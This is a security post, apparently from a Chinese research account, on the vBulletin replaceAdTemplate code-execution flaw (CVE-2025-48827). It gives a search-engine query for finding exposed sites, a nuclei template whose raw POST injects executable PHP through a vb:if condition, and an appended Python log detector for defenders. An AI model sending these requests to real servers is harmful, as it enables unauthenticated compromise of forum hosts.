CVE-2025-48827: vBulletin code execution PoC
z1 Z1sec 2025-06-04 06:32
Disclaimer:
Any direct or indirect consequences or losses arising from the dissemination or use of the information provided by this public account, Z1sec, are the sole responsibility of the user; the account and its authors accept no liability for them, and should any consequences arise you bear them yourself! If any content infringes your rights, please let us know and we will remove it immediately and apologize. Thank you!
Critical unauthenticated API access in vBulletin
PoC details: follow the public account and reply "0604"
Search engine query: app="vBulletin"
nuclei verification template:
```yaml
id: vbulletin-replacead-rce

info:
  name: vBulletin replaceAdTemplate - Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.
  reference:
    - https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
  classification:
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>

    matchers:
      - type: dsl
        dsl:
          - contains(content_type,'application/json')
          - contains_all(body,'string(5)','{{rand_value}}')
          - status_code==200
        condition: and
# digest: 4a0a00473045022039d5fe53f2231bbabadaf62fc548eedf67c6fbffc543aa29a6e96fcd690d9f3d022100a7d55e33136c01b5c3bbbe57691e3cddbc419cba3c4fcf24c313d1e3fe71795b:922c64590222798bb761d5b6d8e72950
```
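Added here as a defender-side example, not part of the original post or of the nuclei template above: a Python check over constructed request records that flags the two-stage pattern the template description outlines (a replaceAdTemplate call that stores a `<vb:if condition=...>` template, then a render of that ad location from the same source). It assumes a reverse-proxy or WAF log that records POST bodies, since ordinary access logs do not; the record layout is an assumption of the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic, not real logs: (source_ip, method, path_with_query, post_body).
# The record layout is an assumption of this example; adapt the loader to your proxy/WAF log.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "POST", "/",
     "routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=qwert"
     "&template=%3Cvb%3Aif+condition%3D%27%22var_dump%22%28%22abcde%22%29%27%3E%3C%2Fvb%3Aif%3E"),
    ("203.0.113.7", "GET", "/ajax/render/ad_qwert", ""),
    ("198.51.100.4", "GET", "/forum/general-discussion", ""),
    ("198.51.100.9", "POST", "/",
     "routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=header&template=%3Cdiv%3Ead%3C%2Fdiv%3E"),
]

TARGET_ROUTE = "ajax/api/ad/replaceAdTemplate"
# Template logic rather than plain ad markup: the probe in the template above is a <vb:if condition=...> tag.
VB_IF_RE = re.compile(r"<vb:if\b[^>]*\bcondition\s*=", re.IGNORECASE)
RENDER_RE = re.compile(r"^ajax/render/ad_([A-Za-z0-9_]+)$")


def resolve_route(method, path, body):
    """vBulletin accepts the route as the URL path or as a routestring parameter; return the
    effective route plus the merged request parameters (query string and form body)."""
    url = urlsplit(path)
    params = parse_qs(url.query)
    if method == "POST":
        params.update(parse_qs(body))
    return params.get("routestring", [url.path.lstrip("/")])[0], params


def classify_requests(records):
    """Return (source_ip, severity, reason) findings in request order.
    high: POST to replaceAdTemplate whose template carries <vb:if condition=...>;
    critical: a later ajax/render/ad_<location> fetch from the same source for a location such a
    POST planted (the second request that triggers the stored template);
    info: any other replaceAdTemplate call, to be reviewed against admin-session records."""
    findings, planted = [], set()
    for src, method, path, body in records:
        route, params = resolve_route(method, path, body)
        if method == "POST" and route == TARGET_ROUTE:
            location = params.get("location", [""])[0]
            if VB_IF_RE.search(params.get("template", [""])[0]):
                planted.add((src, location))
                findings.append((src, "high", f"vb:if condition stored for ad location {location!r}"))
            else:
                findings.append((src, "info", f"replaceAdTemplate call for ad location {location!r}"))
            continue
        rendered = RENDER_RE.match(route)
        if rendered and (src, rendered.group(1)) in planted:
            findings.append((src, "critical", f"render of planted ad location {rendered.group(1)!r}"))
    return findings
```

Because the endpoint is legitimately used by administrators, the "info" findings are meant to be cross-checked against admin sessions rather than alerted on directly.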